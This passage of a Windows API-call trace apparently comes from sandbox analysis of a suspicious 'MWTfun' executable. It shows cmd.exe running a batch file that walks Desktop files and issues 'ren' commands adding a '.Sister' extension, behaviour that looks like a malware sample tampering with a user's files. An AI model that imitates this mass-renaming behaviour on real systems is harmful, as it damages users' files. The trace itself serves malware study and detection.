lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed90dffc0, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0141.404] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8cddfd0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d43690 [0141.405] FindClose (in: hFindFile=0x21ed8d43690 | out: hFindFile=0x21ed8d43690) returned 1 [0141.405] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8cddfd0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d42e50 [0141.405] FindClose (in: hFindFile=0x21ed8d42e50 | out: hFindFile=0x21ed8d42e50) returned 1 [0141.405] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7ee14b39, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x7ee14b39, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8cddfd0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d42e50 [0141.405] FindClose (in: hFindFile=0x21ed8d42e50 | out: hFindFile=0x21ed8d42e50) returned 1 [0141.405] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29182c00, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0x29182c00, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x6a501200, ftLastWriteTime.dwHighDateTime=0x1d61406, nFileSizeHigh=0x0, nFileSizeLow=0x40800, dwReserved0=0x21e, dwReserved1=0xd8cddfd0, cFileName="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", cAlternateFileName="CUSERS~1.EXE")) returned 0x21ed8d434b0 [0141.405] FindClose (in: hFindFile=0x21ed8d434b0 | out: hFindFile=0x21ed8d434b0) returned 1 [0141.406] _wcsnicmp (_String1="CUSERS~1.EXE", _String2="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", _MaxCount=0x35) returned 22 [0141.406] malloc (_Size=0x1ff9c) returned 0x21ed90fff70 [0141.406] ??_V@YAXPEAX@Z () returned 0x21ed90fff70 [0141.407] GetProcessHeap () returned 0x21ed8c70000 [0141.407] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8cddf80 [0141.407] ??_V@YAXPEAX@Z () returned 0x1 [0141.407] ??_V@YAXPEAX@Z () returned 0x1 [0141.409] GetProcessHeap () returned 0x21ed8c70000 [0141.409] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5e410, Size=0x490) returned 0x21ed8d5e410 [0141.409] GetProcessHeap () returned 0x21ed8c70000 [0141.409] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d5e410) returned 0x490 [0141.409] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0141.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.409] GetFileType (hFile=0x50) returned 0x2 [0141.409] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0141.409] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0141.417] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.417] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0141.430] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0141.430] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0141.430] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0141.430] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.430] GetFileType (hFile=0x50) returned 0x2 [0141.430] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0141.430] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0141.434] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.434] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0141.436] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.436] GetFileType (hFile=0x50) returned 0x2 [0141.436] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0141.436] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0141.438] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.438] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d5e3e0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d5e3e0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0141.439] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0141.439] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.439] GetFileType (hFile=0x50) returned 0x2 [0141.439] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0141.439] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0141.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.441] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0141.449] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0141.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.449] GetFileType (hFile=0x50) returned 0x2 [0141.449] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0141.449] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0141.454] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.454] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0141.462] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0141.468] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0141.468] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0141.469] malloc (_Size=0xffce) returned 0x21ed90dffc0 [0141.470] ??_V@YAXPEAX@Z () returned 0x21ed90dffc0 [0141.471] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0141.471] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0141.471] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0141.471] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0141.471] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0141.471] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0141.471] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0141.471] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0141.471] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0141.471] ??_V@YAXPEAX@Z () returned 0x1 [0141.471] GetProcessHeap () returned 0x21ed8c70000 [0141.471] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d43d20 [0141.471] GetProcessHeap () returned 0x21ed8c70000 [0141.471] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d43d20, Size=0x130) returned 0x21ed8d43d20 [0141.471] GetProcessHeap () returned 0x21ed8c70000 [0141.471] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d43d20) returned 0x130 [0141.471] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.471] malloc (_Size=0xffce) returned 0x21ed90dffc0 [0141.472] ??_V@YAXPEAX@Z () returned 0x21ed90dffc0 [0141.472] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.472] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed90dffc0, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0141.473] ??_V@YAXPEAX@Z () returned 0x1 [0141.473] GetProcessHeap () returned 0x21ed8c70000 [0141.473] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d43e60 [0141.473] GetProcessHeap () returned 0x21ed8c70000 [0141.473] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d43fa0 [0141.473] GetProcessHeap () returned 0x21ed8c70000 [0141.473] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d43fa0, Size=0x130) returned 0x21ed8d43fa0 [0141.473] GetProcessHeap () returned 0x21ed8c70000 [0141.473] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d43fa0) returned 0x130 [0141.473] malloc (_Size=0xffce) returned 0x21ed90dffc0 [0141.473] ??_V@YAXPEAX@Z () returned 0x21ed90dffc0 [0141.474] GetProcessHeap () returned 0x21ed8c70000 [0141.474] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d42b50 [0141.474] GetProcessHeap () returned 0x21ed8c70000 [0141.474] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5bc70 [0141.474] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0141.474] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0141.474] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0141.474] GetLastError () returned 0x2 [0141.474] GetProcessHeap () returned 0x21ed8c70000 [0141.474] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed92d1230 [0141.474] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed92d1240 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0141.474] SetErrorMode (uMode=0x0) returned 0x0 [0141.474] SetErrorMode (uMode=0x1) returned 0x0 [0141.474] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed90dffc0, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0141.475] SetErrorMode (uMode=0x0) returned 0x1 [0141.475] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0141.475] GetProcessHeap () returned 0x21ed8c70000 [0141.475] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5d9b0 [0141.475] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0141.475] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0141.475] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0141.475] GetLastError () returned 0x2 [0141.475] ??_V@YAXPEAX@Z () returned 0x1 [0141.476] malloc (_Size=0xffce) returned 0x21ed90dffc0 [0141.476] ??_V@YAXPEAX@Z () returned 0x21ed90dffc0 [0141.476] malloc (_Size=0xffce) returned 0x21ed90effa0 [0141.476] ??_V@YAXPEAX@Z () returned 0x21ed90effa0 [0141.476] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0141.476] GetLastError () returned 0x2 [0141.476] _get_osfhandle (_FileHandle=2) returned 0x54 [0141.476] GetFileType (hFile=0x54) returned 0x2 [0141.477] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0141.477] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0141.545] _get_osfhandle (_FileHandle=2) returned 0x54 [0141.545] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0141.549] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0141.549] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0141.549] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0141.558] longjmp () [0141.558] ??_V@YAXPEAX@Z () returned 0x1 [0141.558] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57ac2b30, ftCreationTime.dwHighDateTime=0x1d5e8ea, ftLastAccessTime.dwLowDateTime=0x46178560, ftLastAccessTime.dwHighDateTime=0x1d5e208, ftLastWriteTime.dwLowDateTime=0x46178560, ftLastWriteTime.dwHighDateTime=0x1d5e208, nFileSizeHigh=0x0, nFileSizeLow=0x1307e, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="AiNxYR.mp4", cAlternateFileName="")) returned 1 [0141.558] GetProcessHeap () returned 0x21ed8c70000 [0141.558] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92c1050, Size=0x158) returned 0x21ed8d440e0 [0141.558] GetProcessHeap () returned 0x21ed8c70000 [0141.558] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d440e0) returned 0x158 [0141.558] GetProcessHeap () returned 0x21ed8c70000 [0141.558] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d5e8b0 [0141.558] GetProcessHeap () returned 0x21ed8c70000 [0141.558] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5e8b0, Size=0x30) returned 0x21ed8d5e8b0 [0141.558] GetProcessHeap () returned 0x21ed8c70000 [0141.558] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d5e8b0) returned 0x30 [0141.558] GetProcessHeap () returned 0x21ed8c70000 [0141.558] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d5e8f0 [0141.559] malloc (_Size=0x1ff9c) returned 0x21ed90fff80 [0141.561] GetProcessHeap () returned 0x21ed8c70000 [0141.561] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x26) returned 0x21ed8cdd210 [0141.562] ??_V@YAXPEAX@Z () returned 0x1 [0141.563] GetProcessHeap () returned 0x21ed8c70000 [0141.563] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5e8f0, Size=0x120) returned 0x21ed8d5e8f0 [0141.563] GetProcessHeap () returned 0x21ed8c70000 [0141.563] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d5e8f0) returned 0x120 [0141.563] GetProcessHeap () returned 0x21ed8c70000 [0141.563] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d5ea20 [0141.563] GetProcessHeap () returned 0x21ed8c70000 [0141.563] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5ea20, Size=0x290) returned 0x21ed8d5ea20 [0141.563] GetProcessHeap () returned 0x21ed8c70000 [0141.564] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d5ea20) returned 0x290 [0141.564] GetProcessHeap () returned 0x21ed8c70000 [0141.564] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d5ecc0 [0141.564] GetProcessHeap () returned 0x21ed8c70000 [0141.564] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5ecc0, Size=0x30) returned 0x21ed8d5ecc0 [0141.564] GetProcessHeap () returned 0x21ed8c70000 [0141.564] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d5ecc0) returned 0x30 [0141.564] GetProcessHeap () returned 0x21ed8c70000 [0141.564] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d5ed00 [0141.564] malloc (_Size=0x1ff9c) returned 0x21ed90fff80 [0141.567] GetProcessHeap () returned 0x21ed8c70000 [0141.567] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x26) returned 0x21ed8cde4e0 [0141.567] ??_V@YAXPEAX@Z () returned 0x1 [0141.568] malloc (_Size=0x1ff9c) returned 0x21ed90fff80 [0141.571] GetFullPathNameW (in: lpFileName="AiNxYR.mp4", nBufferLength=0xffce, lpBuffer=0x21ed90fff80, lpFilePart=0xa6cf4fe1c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\AiNxYR.mp4", lpFilePart=0xa6cf4fe1c8*="AiNxYR.mp4") returned 0x22 [0141.571] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d43330 [0141.572] FindClose (in: hFindFile=0x21ed8d43330 | out: hFindFile=0x21ed8d43330) returned 1 [0141.572] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d42f10 [0141.572] FindClose (in: hFindFile=0x21ed8d42f10 | out: hFindFile=0x21ed8d42f10) returned 1 [0141.572] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7ee14b39, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x7ee14b39, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d43a50 [0141.572] FindClose (in: hFindFile=0x21ed8d43a50 | out: hFindFile=0x21ed8d43a50) returned 1 [0141.572] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\AiNxYR.mp4", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57ac2b30, ftCreationTime.dwHighDateTime=0x1d5e8ea, ftLastAccessTime.dwLowDateTime=0x46178560, ftLastAccessTime.dwHighDateTime=0x1d5e208, ftLastWriteTime.dwLowDateTime=0x46178560, ftLastWriteTime.dwHighDateTime=0x1d5e208, nFileSizeHigh=0x0, nFileSizeLow=0x1307e, dwReserved0=0x4, dwReserved1=0x80, cFileName="AiNxYR.mp4", cAlternateFileName="")) returned 0x21ed8d436f0 [0141.573] FindClose (in: hFindFile=0x21ed8d436f0 | out: hFindFile=0x21ed8d436f0) returned 1 [0141.573] malloc (_Size=0x1ff9c) returned 0x21ed911ff30 [0141.573] ??_V@YAXPEAX@Z () returned 0x21ed911ff30 [0141.575] GetProcessHeap () returned 0x21ed8c70000 [0141.575] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1e) returned 0x21ed8cdc0f0 [0141.575] ??_V@YAXPEAX@Z () returned 0x1 [0141.575] ??_V@YAXPEAX@Z () returned 0x1 [0141.576] GetProcessHeap () returned 0x21ed8c70000 [0141.576] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5ed00, Size=0x120) returned 0x21ed8d5ed00 [0141.576] GetProcessHeap () returned 0x21ed8c70000 [0141.576] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d5ed00) returned 0x120 [0141.576] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0141.576] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.577] GetFileType (hFile=0x50) returned 0x2 [0141.577] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0141.577] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0141.606] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.606] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0141.615] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0141.615] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0141.615] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0141.615] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.615] GetFileType (hFile=0x50) returned 0x2 [0141.615] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0141.615] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0141.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.618] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0141.627] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.627] GetFileType (hFile=0x50) returned 0x2 [0141.628] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0141.628] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0141.917] _get_osfhandle (_FileHandle=1) returned 0x50 [0141.917] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d5e8c0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, 